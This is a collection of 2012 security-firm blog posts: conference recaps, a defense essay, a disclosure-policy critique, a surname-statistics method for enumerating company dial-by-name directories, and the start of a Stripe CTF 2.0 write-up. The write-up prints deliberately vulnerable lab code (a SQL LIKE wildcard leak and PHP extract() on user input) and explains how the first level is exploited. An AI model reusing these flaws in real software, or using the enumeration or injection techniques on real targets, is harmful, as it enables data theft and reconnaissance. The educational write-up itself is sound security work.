INSIGHTS | October 24, 2012

The WECC / NERC Wash-up

Last week in San Diego, IOActive spoke at both the Western Electricity Coordinating Council (WECC) and NERC GridSec (GridSecCon) conferences. WECC is primarily an auditor audience and NERC-CIP is compliance-focused, while GridSecCon is the community and technical security authority for the electricity industry in the U.S. There was a great turnout for both conferences, with more than 200 attendees across three days per conference. IOActive security researcher Eireann Leverett presented “The Last Gasp of the Industrial Air-Gap…”at WECC and participated in a discussion panel on Industry Best Practice for Grid Security at GridSecCon.

WECC
An auditors forum, what can I say…other than they do have a great sense of humor [they got Eireann’s Enron corporate failure joke], apparently enjoy a drink like everyone else and definitely need our help and perspective when it comes to understanding the disparity between being compliant and being secure. Day 1 was a closed session for WECC members only, where they discuss god only knows what. Day 2 is where IOActive got involved, with the morning session focusing on Cyber Security and explaining in a little more detail the security challenges the industry faces which are aligned to CIP audit and compliance programmes. Eireann, Jonathan Pollet and Tom Parker all gave great talks which some could argue were a little too technical for the audience, but they were well received nonetheless. More work is definitely needed with forums such as WECC and the NERC standards council to ensure the gap between CIP compliance and the actual state of Energy security is further reduced.
GridSecCon
The audience at GridSecCon was anything but a single area of expertise like we saw at the WECC conference. I engaged with folk from security, engineering, risk management, consulting, audit and compliance and technology backgrounds.From that its fair to say the Industrial Control System and Energy sector is a red-hot opportunity for new rules, new products, new ideas…and new failures! Eireann was in fine form again on the panel – which was made up of consulting, product vendors and Government – throwing in a quote from Trotsky, a Russian Marxist revolutionary.

. I laughed, but not sure the rest of the crowd appreciated the irony. European humor at work J.  I didn’t see as much as I would have liked to on the Supply Chain side of things including the term Security of Supply, which is widely used in Europe. More work is definitely needed in these areas and is something I will look at in 2013.
Day 1 saw some interesting talks on Social Engineering threats and a panel discussion on Malware threats to the sector. The threat of Social Engineering in the Energy sector in terms of awareness is clearly on the rise.  Positively, it seemed organizations were placing more emphasis [I said more, not enough] on educating SCADA Operations staff around Phishing and Telephony based attacks. Tim Roxy from NERC oversaw the Malware panel as participants openly discussed the threat of new Malware targeting the Energy sector, in particular the effects of SQL Slammer on SCADA systems and a review of the recent attack on Saudi Aramco (Shamoon Malware). It was unclear if the SCADA networks at Saudi Aramco were affected but obviously there are similar challenges in store as SCADA and Corporate networks continue to converge. The incident also triggered an unprecedented response exercise involving reviews of up to 120 of Saudi Aramco’s Plant sites across the Middle East region.

 
Day 2 was kicked off by an excellent Key Note talk by Admiral Thad Allen, [retired] US Coast Guard, on Incident Response and his view of the challenges national infrastructure security is facing in the US, which could easily be applied globally. Undeniably, Admiral Allen said complexity was the biggest challenge we face in securing existing and new national infrastructure. His talk gave examples of his experience in dealing with incidents such as hurricane Katrina in New Orleans, in particular, the importance of defining exactly what the problem is before even thinking about how to respond to it. Not correctly understanding the problem in relation to coordinating an effective response could mean an expensive and ineffective solution, which is exactly where the Energy sector sits today – “stop admiring the problem, start working on the solution.”

Technical vs. Risk Management – the age-old conundrum
It still surprises me to see after 15 odd years of our industry coming to the forefront and an estimated 50+ billion dollar spend in implementing technical security measures that we continue to see the topic of technical vs. risk management come up at these conferences. If technical solutions were security nirvana we wouldn’t be worried about anything today would we? Of course we need both areas, and each is an important as the other. Sure, the technical stuff may seem more interesting, but if we can’t sell the importance of what the tech tells us in a business language the overall security of the Energy industry will continue to struggle for traction. Likewise, the perceived notion that compliance to standards like CIP/ISO27000 etc. etc. keep us safe at night will continue to skew the real picture unless we can talk tech, risk and compliance at the same time.
What are the conferences missing?
Maybe I don’t attend enough conferences, and I understand client sensitivities in sharing this sort of information, but what these conferences need more of is a view from the field – what is actually going on below all the conversations about risk management, compliance and products. Again, stop admiring the problem, admit we have one by analyzing what’s actually going on in the field, and use this to inform programmes of work to solve the issues. We know what good looks like; only talking about it is as useful in the real world as a chocolate teapot…
Key Take Aways
Did I learn anything new? Of course I did, however a lot of the core messages like “we need to talk tech and risk management” and “sector-wide information sharing” continue to be old wine in new bottles for me, especially while governments set strict rules on who they value information from [who they deem as appropriate] and how it can be done [at their approval]. And it’s a little troubling if we have a whole industry sector with its concerns around the security of national infrastructure still trying to understand the importance of risk management or the gaps between compliance and actual security. Saying that, WECC and NERC are clearly making concerted efforts to move thing in the right direction.
 Wicked Problems and Black Swans [Day 2 Key Note, Admiral Thad Allen]. Again, a great talk by Admiral Allen and some great perspective. A Wicked Problem: something we know is there but we don’t have an answer to [lack of Utilities investment in Grid security]. A Black Swan: an outcome so dire it doesn’t seem likely [Grid failure/compromise].

 

As I see it, we need to be more vocal in participating in the sector forums and share [in a generic fashion] what we are seeing in the field, which should further inform organizations like WECC and NERC with a view to continued security improvement across the sector.
 San Diego is hot, the Tex Mex food is great…and I’ll hopefully see you all at WECC & NERC in 2013!
INSIGHTS | October 11, 2012

SexyDefense Gets Real

As some of you know by now, the recent focus of my research has been defense. After years of dealing almost exclusively with offensive research, I realized that we have been doing an injustice to ourselves as professionals. After all, we eventually get to help organizations protect themselves (having the mindset that the best way to learn defense is to study the offensive techniques), but nevertheless, when examining how organizations practice defense one has a feeling of missing something.
For far too long the practice (and art?) of defense has been entrusted to bureaucrats and was lowered down to a technical element that is a burden on an organization. We can see it from the way that companies have positioned defensive roles: “firewall admin,” “IT security manager,” “incident handler,” and even the famous “CISO.” CISOs have been getting less and less responsibility over time, basically watered down to dealing with the network/software elements of the organization’s security. No process, no physical, no human/social. These are all handled by different roles in the company (audit, physical security, and HR, respectively).
This has led to the creation of the marketing term “APT”: Advanced Persistent Threat. The main reason why non-sophisticated attackers are able to deploy an APT is the fact that organizations are focusing on dealing with extremely narrow threat vectors; any threat that encompasses multiple attack vectors that affect different departments in an organization automatically escalates into an APT since it is “hard” to deal with such threats. I call bullshit on that.
As an industry, we have not really been supportive of the defensive front. We have been pushing out products that deal mainly with past threats and are focused on post-mortem detection of attacks. Anti-virus systems, firewalls, IDS, IPS, and DLP – these are all products that are really effective against attacks from yesteryears. We ignore a large chunk of the defense spectrum nowadays, and attackers are happily using this against us, the defenders.
When we started SexyDefense, the main goal was to open the eyes of defensive practitioners, from the hands-on people to executive management. The reason for this is that this syndrome needs to be fixed throughout the ranks. I already mentioned that the way we deal with security in terms of job titles is wrong. It’s also true for the way we approach it on Day 1. We make sure that we have all the products that industry best practices tell us to have (which are from the same vendors that have been pushing less-than-effective products for years), and then we wait for the alert telling us that we have been compromised for days or weeks.
What we should be doing is first understanding what are we protecting! How much is it worth to the organization? What kind of processes, people, and technologies “touch” those assets, and how do they affect it? What kind of controls are there to protect such assets? And ultimately, what are the vulnerabilities in processes, people, and technologies related to said assets?
These are tough questions – especially if you are dealing with an “old school” practice of security in a large organization. Now try asking the harder question: who is your threat? No, don’t say hackers! Ask the business line owners, the business development people, sales, marketing, and finance. These are the people who probably know best what are the threats to the business, and who is out there to get it. Now align that information with the asset related ones, and you get a more complete picture of what you are protecting, and from whom. In addition, you can already see which controls are more or less effective against such threats, as it’s relatively easy to figure out the capabilities, intent, and accessibility of each adversary to your assets.
Now, get to work! But don’t open that firewall console or that IPS dashboard. “Work” means gathering intelligence on your threat communities, keeping track of organizational information and changes, and owning up to your home-field advantage. You control the information and resources used by the organization. Use them to your advantage to thwart threats, to detect intelligence gathering against your organization, to set traps for attackers, and yes, even to go the whole 9 yards and deal with counterintelligence. Whatever works within the confines of the law and ethics.
If this sounds logical to you, I invite you to read my whitepaper covering this approach [sexydefense.com] and participate in one of the SexyDefense talks in a conference close to you (or watch the one given at DerbyCon online: [http://www.youtube.com/watch?v=djsdZOY1kLM].
If you have not yet run away, think about contributing to the community effort to build a framework for this, much like we did for penetration testing with PTES. Call it SDES for now: Strategic Defense Execution Standard. A lot of you have already been raising interest in it, and I’m really excited to see the community coming up with great ideas and initiatives after preaching this notion for a fairly short time.
Who knows what this will turn into?
INSIGHTS | October 2, 2012

Impressions from Ekoparty

Another ekoparty took place in Buenos Aires, Argentina, and for a whole week, Latin America had the chance to meet and get in touch with the best researchers in this side of the world.
A record-breaking number of 150 entries were received and analysed by the excellent academic committee formed by Cesar Cerrudo, Nico Waisman, Sebastian Muñiz, Gerardo Richarte, Juliano Rizzo.
There were more than 1500 people who enjoyed of 20 talks without any interruption, except when the Mariachis played.
Following last year’s ideas, when ekoparty became the last bastion of resistance to rebellion against machines, this resistance had to move out of the earth to fight the battle of knowledge sharing in another world.
IOActive again accompanied us with all their research team with an excellent stand that included a bartender and a bar throughout the event. IOActive went for more and also sponsored the VIP dinner to honor all exhibitors, organizers and sponsors, who accepted the challenge: Argentine asado vs. Tacos, prepared by their own research team. It was a head-to-head contest, but the advantage was that the meat was from Argentina 🙂

 

We would like to thank all the researchers, participants, sponsors that contribute to ekoparty’s growth! See you back next year to find out how this story goes on!

By Jennifer Steffens @securesun

For those who know me, I’m no stranger to the world of conferences and have attended both big and small cons around the world. I love experiencing the different communities and learning how different cultures impact the world of security as a whole. I recently had the pleasure of attending my second Ekoparty in Buenos Aires with IOActive’s Latin American team and it was again one of my all time favorites.

To put it simply, I am blown away by both the conference and the community. Francisco, Federico and crew do an amazing job from start to finish. The content is fresh and innovative. They offer all the great side acts that con attendees have grown to love – CTF, lock picking stations, giant robots with lasers, a computer museum as well as the beloved old school Mario Brothers game. Even the dreaded vendor area is vibrant and full of great conversations – as well as a bit of booze thanks to both our bar service and Immunity’s very tasty beer!

But the real heart of Ekoparty is the community. The respect and openness that everyone brings to the experience is refreshing and gives the conference a very “family-like” feel – even with 1500 people. I met so many interesting people and spent each day engaged in inspiring conversations about the industry, the culture and of course, how to be a vegetarian in Argentina (not easy AT ALL!).

A special thanks to Federico and Francisco for the invitation and generous VIP treatment throughout the week. It was a great opportunity for us to bring IOActive’s Latin American team together, which now includes 12 researchers from Argentina, Brazil, Colombia and Mexico; as well as meet potentially new “piratas” in the making. I am amazed every day at what that team is able to accomplish and am already looking forward to Ekoparty 2013 with an even bigger team of IOActive “piratas” joining us.

¡Gracias a los organizadores, speakers y asistentes de la Ekoparty 2012. La semana fue fantástica y espero verlos el año que viene!

 

By Cesar Cerrudo @cesarcer

 

This was my 5th time presenting in Ekoparty (I just missed one Ekoparty when my son was born 🙂), Ekoparty is one of my favorites conferences, I feel like a part of it, it’s on my own country which makes it special for me. It’s nice to get together with all the great Argentinean hackers, which by the way are very good and many, and with a lot of friends and colleagues from around the world. During all these years I have seen the growth in quality and quantity, I can say that this conference is currently at the same level that the big and most known ones and every year gets better.

 

This year I had the honor to give the aperture keynote “Cyberwar para todos”  where I presented my thoughts and views on the global Cyberwar scenario and encourage people to research the topic and get their own thoughts and conclusions.

 

We sponsored a VIP dinner where speakers, sponsors and friends enjoyed a great night with some long awaited Mexican tacos! Also we had a nice booth with free coffee service in the morning and open bar after noon, I don’t think it’s necessary to stress that it was a very, very popular booth 🙂

 

The talks were great and there was lot of research presented for the first time at Ekoparty, just take a look at recent news and you will see that this is not just “another“ conference. Last time I remember a security/hacking conference got so many related news was Black Hat/Defcon. We could say Ekoparty is becoming one of the most important world security/hacking conferences.

 

 By Stephan Chenette @StephanChenette

OK I’ll try my best to follow Cesar, this years keynote speaker, Francisco, one of the founders of EkoParty and Jennifer our CEO in giving an impression of the EkoParty conference. If you haven’t been to EkoParty, stop what you’re doing right now, check out the web site (http://ekoparty.org) and set yourself a reminder to buy a plane ticket and a entry ticket for next year – because this is a con worth attending. If nothing else you’ll learn or confirm what you had thought for years: that the Latin American hacker community is awesome and you should be paying attention to their research if you haven’t been already.

Three days long, EkoParty is compromised of a CTF, Lock picking area, training, and 20 interesting talks on research and security findings. The venue is something you’d expect from CCC or PH-Neutral: An Industrial, bare-bones building loaded up with ping pong tables and massive computing power with no shortness of smoke machines, lights and crazy gadgets on stage…oh and as you read above in Francisco’s summary, a Mariachi band (hey, it is Argentina!).

The building reminded me of the the elaborate Farady cage Gene Hackman had set up in the movie Enemy of the State that was used to hide from the CIA. Except Eko Party was filled with around 1500 attendees and organizers.

 

 

 

IOActive sponsored a a booth and tried their best to provide the attendees with as much quality alcohol as possible =] 
 

Our booth is where I spent most of my time when not seeing talks, so that I could hang out with IOActive’s Latin American team members originating from Mexico, Brazil, Colombia and Argentina.

I saw a number of talks while at EkoParty, but I’m sure most of you will agree the three most noteworthy talks were:
    • CRIME (Juliano Rizzo and Thai Doung)

 

    • Cryptographic Flaws in Oracle Database Authentication Protocol (Esteban Fayo)

 

    • Dirty use of USSD Codes in Cellular Network (Ravi Borgaonkar)

 

I won’t go into details on the above talks, as more information is now available online about them.
I was lucky enough to be accepted as as speaker this year and talk on research focused around defeating network and file-system detection. My past development experience is on detection of threats, but as I stated in my presentation: You must think offensively when creating defensive technology and make no mistake of overselling it’s limitations – a problem most salespeople at security companies have these days.
I spent about 75% of my time reviewing various content detection technologies from the last 20 years and explaining each one of their limitations. I then talked about the use of machine learning and natural language processing for both exploit and malware  detection as well as attribution. 
Machine learning like any technology used in defense, has it’s limitations and I tried to explain my point of view and importance of not only having a layered defense, but having a well thought  out layered defense that makes sense for your organization. 
As I stated in my presentation, attackers have several stages they typically go through to pull off a full attack and successfully ex-filtration data:

 

    • Recon (Intelligence gathering)

 

    • Penetration (exploitation of defenses)

 

    • Control (staging a persistent mechanism within the network)

 

    • Internal Recon

 

    • Ex-filtration of data

 

In my presentation I looked at the reality in offensive techniques against detection technologies: Attackers are going to stay just enough ahead of the defense curve to avoid detection.

 

(Stephan Chenette’s presentation on
“the Future of Automated Malware Generation”)
For example with Gauss and Zeus we’ve seen dlls being encrypted with a key only found on the targeted machine and downloaded binaries encrypted with information from the infected host – FYI – encrypting binaries with target information basically kills the possibility of any behavior sandbox from being able to run the binary outside of it’s intended environment.
So maybe attackers of the future will only make incremental improvements to thwart detection OR maybe we’ll start seeing anti-clustering and anti-classifications added to the attacker’s arsenal as machine learning is added as another layer of defense – The future is of course unknown – but I do have my suspicions.
In my concluding slides I stressed that there is much improvement that can be made on the side of detecting the threat before it happens as well as making sure that a defensive strategy should be layered in a manor that focuses on making the attacker spend, time, resources and different skill levels at each layer, hopefully comprising enough of his or herself in the process and giving the targeted organization enough time to mitigate the threat if not halt the attack all together.
This was by far the largest crowd I’ve ever spoken in front of and goes down as one of the best conferences I’ve attended. Thanks again EkoParty committee for inviting me to present, I’ll try my best to be back next year!!





By Ariel Sanchez

 

We had the opportunity at the Ekoparty to attend  presentations which a show high level of innovation and creativity.

 

Here are some personal highlights:

 

 *The CRIME Attack presentation by Juliano Rizzo and Thai Doung

 

 *Trace Surfing presentation by Agustin Gianni

 

 *Cryptographic flaws in Oracle Database authentication protocol presentation by Esteban Fayo

 

I can’t wait to see what is coming in the next ekoparty!

 

 

By Tiago Assumpcao @coconuthaxor

 

If my memory is accurate, this was my fourth EkoParty. From the first time to now, the numbers related to the conference have grown beyond my imagination. On the other hand, EkoParty remains the same on another aspect: it has the energetic blood of Latin American hackers. Too many of them, actually. Buenos Aires has a magical history of popping up talents like nowhere else. And the impressive numbers and quality of EkoParty, today, definitely have to do with that magic.

 

There were many great talks, on a wide range of topics. I will summarize the ones I mostly appreciated, being forced to leave aside the ones I didn’t have the chance to catch.

 

Cyberwar para todos, I’ve seen people complaining about this topic, either because it’s political (rather than technical), or because “it’s been too stressed” already. In my opinion, one can’t ignore how the big empires think of information security. Specifically, here is what I liked about this talk: the topic might have been stressed in North America, but the notion of cyberwar, per Gen. Keith Alexander’s vision, is still unknown to most in South America. A few years ago, the Brazilian CDCiber (Cyber Defense Centre) was created and, despite effort coming directly from the President, the local authorities are still very naïve, to say least, if compared to their rich cousins. Cesar raises questions about that.

 

Satellite baseband mods: Taking control of the InmarSat GMR-2 phone terminal, this was probably my favorite talk. They showed how a user can easily modify satellite phones at will, poking data that comes in and out of the device. Furthermore, the presenters showed how communication technologies very similar to GSM, when applied over a different medium, can open whole new vectors of potential attacks. Finally, Sebastian “Topo” Muniz is one of the most hilarious speakers in the infosec industry.

 

Trace Surfing, this is one of those rare talks that resolve hard problems with very simple solutions. Agustín showed how one can retrieve high-level information about the Windows heap, during the course of an execution trace, simply by tracking ABI specifics at call-sites of choice. The simplicity of his solution also makes it really fast. Great work!

 

PIN para todos (y todas), basically Pablo Sole created an interface that allows one to write Pin-based tools to instrument JavaScript. I heard it’s impressively fast.

 

What I really wanted to have seen, but couldn’t…

 

OPSEC: Because Jail is for wuftpd, unfortunately, they had Grugq speaking at 9am. I can’t digest humour so early and will have to ask him for a secondhand presentation.

 

Literacy for Integrated Circuit Reverse Engineering, very sadly, I didn’t catch Alex’s presentation. But if you are into reverse engineering modern devices, I would recommend it with both my eyes closed, nonetheless.

 

 

By Lucas Apa @lucasapa

What begun publicly as an e-zine in the early century now arises as the most important latin american security conference “ekoparty”. All the latin american team landed Buenos Aires to spend an amazing week.
My “ekoparty week” started on monday where I got invited to attend a “Malware Analysis Training” by ESET after solving a challenge of “binary unpacking” posted on their blog. First, two intensive days were held with paid trainings which covered the following topics: cracking, exploiting, sap security, penetration testing,  web security, digital forensics and threats defense. Every classroom was almost fully booked.

The conference started on Wednesday in “Konex Cultural Center”, one of the most famous cultural centers especially for music and events. The building used to be an oil factory some decades ago.
On Wednesday, our CTO Cesar Cerrudo, was the main keynote of the day.
Many workshops were open for any conference assistant for the rest of the day.

At night we enjoyed a classic “Mexican Grill” at IOActive’s party where VIP guests were invited. The meal was brought you by Alejandro Hernández and Diego Madero, our Mexican Security Consultants.
On Thursday and Friday were the most awaited days since the presentations were going to start.

My favorite talks were:

*Taking control of the InmarSat GMR-2 phone terminal (Sebastian Muñiz and Alfredo Ortega): Without modifying the firmware image, researchers managed to send AT commands to the phone terminal to write arbitrary memory. They copied binary instrumentation code for logging and hooking what really sends the phone on common actions like sending SMS. Then, they wrote the “data” section for redirecting the flow at some point and discovered that messages sent to the satellite “might” be vulnerable to
“memory corruption” if they are preprocessed by the satellite before retransmision. No satellites were harmed.

*VGA Persistent Rootkit (Nicolás Economou and Diego Juarez): Showed a new combo of techniques for modifing reliably the firmware of a VGA card to execute code or add new malicious basic blocks.

*The Crime (Juliano Rizzo and Thai Duong): The most awaited talk revealed a new chosen plaintext attack where compression allowed to recognize which secuences of bytes were already on the TLS data. The attack works like BEAST, with two requirements: capture encrypted victim’s traffic and control his browser by using a web vulnerability (or MITM on an HTTP service). When forcing the browser to issuing some specific words on the HTTP resource location, they figured that if that portion of the random string is already on the cookie the TLS data gets more compressed. This allows to bruteforce to identify the  piggybacked cookie that is automatically added to the request.

*The Future of Automated Malware Generation (Stephan Chenette): Our Director of R&D showed how different AV’s performs approaches for detecting malware mostly failing. It is difficult to defend ourselves in something we dont know but we must remember that attackers are also having fun with Machine Learning too !

*Cryptographic flaws in Oracle DB auth protocol (Esteban Fayó): When authenticating a user, Oracle uses the hashed password (on the database) as the key for encrypting the server session (random). The user hashes its password and then tries to decrypt the encrypted session that the server returned. The problem is that is possible to recognize if this decryption returns an invalid padding so the initial password can be tried offline. This allows to bruteforce the process of decrypting locally till a valid padding occurs (sometimes it colides with a valid padding but it’s not actually the password). This vulnerability was
reported to Oracle 2 years ago but no patch was provided by them till then.

 

By Alejandro Hernández @nitr0usmx

 

After a 10 hours delayed flight, finally I landed to Buenos Aires. As soon as I could, I went straight to the VIP party to meet with the IOActive team and to prepare some mexican tacos and quesadillas (made by Diego Bauche @dexosexo).

 

The next day, Thursday, I had the chance to be at the Stephan Chanette’s talk (@StephanChenette), which was a really interesting presentation about automated malware generation and future expectations. His presentation had a good structure because he started with the current state of malware generation/defense and later he explained the future of malware generation/defense passing through the actual malware trends. The same day, I enjoyed the Esteban Fayo’s talk (@estemf) because he showed a live demo on how to crack an Oracle password taking advantage of some flaws in the Oracle authentication protocol.

 

The venue, KONEX, the same as the last year, was really cool, there were vendors booths, old computers, video games (where I spent like two hours playing Super Mario Bros) as well as a cocktail bar, obviously the IOActive booth ;).

 

In conclusion, I really had a great time with my fellow workers, drinking red wine and argentine asado, besides amazing conferences.

 

Definitely, I hope to be there the next year.
INSIGHTS | September 26, 2012

Completely Unnecessary Statistical Analysis: Phone Directory

 
Disclaimer: I am not a statistician.

 

A particular style of telephone company directory allows callers to “dial by name” to reach a person, after playing the matching contacts’ names.  In the example used here, input must be given as surname + given name with a minimum of three digits using the telephone keypad (e.g. Smith = 764). To cover all possible combinations, you’d calculate 8^3, or 512 combinations. With a directory that allowed repeated searches in the same call, it would take about seven hours of dialing to cover all possible combinations.

 

Let’s use available data to try and reduce the complexity of the problem while increasing the return on effort – like the giant nerds we are.

 

The 2000 U.S. Census provided raw data[1] on over 150,000 surnames occurring 100 or more times in the population. This puts the lowest occurrence of a surname in the data at 1 in 2,500,000. The uncounted surnames[2] represent 10.25% of people counted in the 2000 Census. This means our data only cover 89.75%* of the U.S. population, but we can safely assume† that the remaining names closely follow the patterns established in the data we do have available.

 

In this analysis, the first three characters of each surname in the Census data were converted into a three-digit combination using a telephone keypad conversion function. The resulting data were manipulated using an Excel pivot table to group matching combinations and sum the percentage of occurrence. This resulted in a table that ranked each combination. To facilitate the creation of interactive charts, this data was then imported into a Google Spreadsheet[3].

 

Results Summary

 

 
 

 

Unsurprisingly, the distribution of surnames for the patterns is non-uniform, with favorable spikes. Sorting by rank, we find the best pattern – 227 – should return 2% of the surnames for the average U.S. company. What’s more exciting is that we can use a smaller amount of effort to achieve a larger than expected amount of results. Searching by ascending rank to return 50% of the surnames, you only need to search 67 patterns, which is 13% of all possible combinations. To return 90% of the surnames you only need to search 241 patterns, which is 47% of all possible combinations. Some milestones are listed in the chart below.

 

 

 

 

 

The following chart shows the curvilinear relationship of the expected returns versus the  effort expended.

 

 

 

Test Case
A test case was performed against an actual U.S. company phone directory, with a medium-sized population that happened to be highly biased to Polish surnames. Approximately 120 names were “randomly” selected based on a known list of employees and the patterns for each were searched. In spite of the bias, the test case correlated well with the expected results.

 

The highest number of surnames (6) was returned by pattern 627 (3rd Rank), the second highest number of surnames (5) was returned by pattern 227 (1st Rank) and the fourth highest number of surnames (3) was returned by pattern 726 (5th Rank). These three data points average to estimate a total population of 300, which is close to the expected size of the company.

 

The U.S. Census includes racial data, which may be helpful in tailoring to certain populations, but surnames by state would be more helpful, which do not appear to be available. A geographic breakdown could improve results in the test case.

 

Notable Facts
·         Three patterns do not appear in this data: 577, 957, 959.

 

·         Sorted by rank, the last 10% of surnames require 53% of the effort.

 

·         Surname data from the 2010 Census was not compiled and is not available.

 

·         Unlike the U.S., Canada has a large population of 2-letter surnames[4].

 

·         Canada’s government does not release surname data.

 

Get The Full List

 

Thanks to Nick Roberts of Foundstone for supplying a Canadian point of view on the subject.

 

References
*  Two-letter surnames were excluded. This reduces the coverage of the analysis by 0.25% to 89.50% of the total population, a negligible change. Since entering these surnames would require the first letter of the given name, these should be analyzed separately for the distribution of given names, with some consideration to the biases of ethnicity. The U.S. Census does not consider surnames with one character valid.

 

†  Some references in this document extrapolate the Census data to include 100% of the population for clarity. The spreadsheet[4] available lists percentages of both the sample data and the population as a whole for accuracy.

http://www.census.gov/genealogy/www/data/2000surnames/index.html

https://docs.google.com/spreadsheet/pub?key=0Akoj1-Rq-rX7dFJ4aURZdmJnU1FDQUxlcTVXWGFLTkE&output=html

http://www.cbc.ca/news/background/name-change/common-surnames.html

INSIGHTS | September 11, 2012

Malware Doesn’t Care About Your Disclosure Policy, But You Better Have One Anyway

All over the world, things are changing in ICS security—we are now in the spotlight and the only way forward is, well, forward. Consequently, I’m doing more reading than ever to keep up with technical issues, global incidents, and frameworks and policies that will ensure the security of our future.

From a security researcher’s perspective, one exciting development is that .gov is starting to understand the need for disclosure in some cases. They have found that by giving companies lead time to implement fixes, they often get stonewalled for months or years. Yes, it sometimes takes years to fix specific ICS security issues, but that is no excuse for failing to contact the researcher and ICS-CERT with continually-updated timelines. This is well reflected in the document we are about to review.

The Common Industrial Control System Vulnerability Disclosure Framework was published a bit before BlackHat/Defcon/BSideLV, and I’ve just had some time to read it. The ICSJWG put this together and I would say that overall it is very informative.

For example, let’s start with the final (and most blogged about) quote of the Executive Summary:

“Inconsistent disclosure policies have also contributed to a public perception of disorganization within the ICS security community.”

I can’t disagree with that—failure to have a policy already has contributed to many late nights for engineers.

On Page 7, we see a clarification of vulnerabilities found during customer audits that is commendable:

“Under standard audit contracts, the results of the audit are confidential to the organization customer and any party that they choose to share those results with. This allows for information to be passed back to the vendor without violating the terms of the audit. The standard contract will also prevent the auditing company from being able to disclose any findings publically. It is important to note however, that it is not required for a customer to pass audit results on to a vendor unless explicitly noted in their contract or software license agreement.”

Is there a vendor who explicitly asks customers to report vulnerabilities in their license agreements? Why/why not?

On Page 9, Section 5 we find a dangerous claim, one that I would like to challenge as firmly and fairly as I can:

“Not disclosing an issue is not discussed; however it remains an option and may be appropriate in some scenarios.”

Very, well. I’m a reasonable guy whose even known to support responsible disclosure despite the fact it puts hand-cuffs on only the good guys. Being such a reasonable guy, I’m going to pretend I can accept the idea that a company selling industrial systems or devices might have a genuine reason to not disclose a security flaw to its customers. In the spirit of such a debate, I invite any vendor to comment on this blog post with a hypothetical scenario in which this is justified.

Hypothetically speaking: When is it appropriate to withhold vulnerabilities and not disclose them to your ICS customers?

While we’re at it, we also see the age-old disclosure always increases risk trope again, here:

“Public Disclosure does increase risk to customers, as any information disclosed about the vulnerability is available to malicious individuals as well as to legitimate customers. If a vulnerability is disclosed publically prior to a fix being made available, or prior to an available fix being deployed to all customers, malicious parties may be able to use that information to impact customer operations.”

Since I was bold enough to challenge all vendors to answer my question about when it is appropriate to remain silent, it’s only fair to tackle a thorny issue from the document myself. Imagine you have a serious security flaw without a fix. The argument goes that you shouldn’t disclose it publicly since that would increase the risk. However, what if the exploit were tightly constrained and detectable in 100% of cases? It seems clear that in this case, public disclosure gives the best chance for your customers to DETECT exploitation as opposed to waiting for the fix. Wouldn’t that DECREASE risk? Unfortunately, until you can measure both risk and the occurrence of 0-day vulnerabilities in the wild RELIABLY, this is all just conjecture.

There exists a common misconception in vulnerability management that only the vendor can protect the customer by fixing an issue, and that public disclosure always increases risk. With public disclosure, you widen the circle of critical and innovative eyes, and a third party might be able to mitigate where the vendor cannot—for example, by using one of their own proprietary technologies.

Say, for example, that a couple of ICS vendors had partnered with an Intrusion Detection and Prevention system company that is a known defender of industrial systems. They could then focus their early vulnerability analysis efforts on detecting and mitigating exploits on the wire reliably before they’re even fixed. This would reduce the number of days after zero the exploit can’t be detected and, to my thinking, that reduces the risk. I’m disappointed that—in the post-Stuxnet era—we continue to have ICS disclosure debates because the malware authors ultimately don’t even care. I can’t help but notice that recent ICS malware authors weren’t consulted about their “disclosure policies” and also didn’t choose to offer them.

As much as I love a lively debate, I wanted to commend the ICSJWG for having the patience to explain disclosure when the rest of us get tired.

INSIGHTS | August 29, 2012

Stripe CTF 2.0 Write-Up

Hello, World!

I had the opportunity to play and complete the 2012 Stripe CTF 2.0 this weekend. I would have to say this was one of the most enjoyable CTF’s I’ve played by far.  They did an excellent job. I wanted to share with you a detailed write-up of the levels, why they’re vulnerable, and how to exploit them. It’s interesting to see how multiple people take different routes on problems, so I’ve included some of the solutions by Michael Milvich (IOActive), Ryan O’Horo(IOActive), Ryan Linn(Spiderlabs), as well as my own (Joseph Tartaro, IOActive).
I hope this write-up gives you guys the opportunity to learn something new or get a better understanding of how I  approached this CTF. I’ve included all the main source code that was available at the information page of each level, even if it was unnecessary, just so people could see it all if they were interested. If you have any further questions you should feel free to e-mail me at Joseph.Tartaro[at]ioactive[dot]com, or make a comment below.
Lets get started!
Level 0  –  SQL Injection
Level 1  –  Misuse of PHP Function on Untrusted Data
Level 2  –  File Upload Vulnerability
Level 3  –  SQL Injection
Level 4  –  XSS/XSRF
Level 5  –  Insecure Communication
Level 6  –  XSS/XSRF
Level 7  –  SHA1 Length-Extension Vulnerability
Level 8  –  Side Channel Attack
Source Code 

Level 0:

Welcome to Capture the Flag! If you find yourself stuck or want to learn more about web security in general, we’ve prepared a list of helpful resources for you. You can chat with fellow solvers in theCTF chatroom (also accessible in your favorite IRC client atirc://irc.stripe.com:+6697/ctf).
We’ll start you out with Level 0, the Secret Safe. The Secret Safe is designed as a secure place to store all of your secrets. It turns out that the password to access Level 1 is stored within the Secret Safe. If only you knew how to crack safes
You can access the Secret Safe at https://level00-2.stripe-ctf.com/user-juwcldvclk. The Safe’s code is included below, and can also be obtained via git clone https://level00-2.stripe-ctf.com/user-juwcldvclk/level00-code.

So quickly looking at the code, the main areas we’re interested in are right here ….

*SNIP*

sqlite3 = require('sqlite3'); // SQLite (database) driver

*SNIP*

  if (namespace) {
    var query = 'SELECT * FROM secrets WHERE key LIKE ? || ".%"';
    db.all(query, namespace, function(err, secrets) {
             if (err) throw err;

renderPage(res, {namespace: namespace, secrets: secrets});
});

We can see that it’s querying the SQL database with our user-supplied input. We also know that it is an sqlite3 database. When looking at the SQL statement, we can see that it’s using the LIKE operator, which happens to have a wildcard character (%). When we supply the wildcard character, it will respond with all the secrets in the database.

Level 1:

Excellent, you are now on Level 1, the Guessing Game. All you have to do is guess the combination correctly, and you’ll be given the password to access Level 2! We’ve been assured that this level has no security vulnerabilities in it (and the machine running the Guessing Game has no outbound network connectivity, meaning you wouldn’t be able to extract the password anyway), so you’ll probably just have to try all the possible combinations. Or will you…?
You can play the Guessing Game at https://level01-2.stripe-ctf.com/user-jkcftciszp. The code for the Game can be obtained fromgit clone https://level01-2.stripe-ctf.com/user-jkcftciszp/level01-code, and is also included below.
So quickly looking at the code, here’s the block we’re interested in….
    <?php
      $filename = 'secret-combination.txt';
      extract($_GET);
      if (isset($attempt)) {
        $combination = trim(file_get_contents($filename));
        if ($attempt === $combination) {
          echo "<p>How did you know the secret combination was" .
               " $combination!?</p>";
          $next = file_get_contents('level02-password.txt');
          echo "<p>You've earned the password to the access Level 2:" .
               " $next</p>";
        } else {
          echo "<p>Incorrect! The secret combination is not $attempt</p>";
        }
      }
    ?>
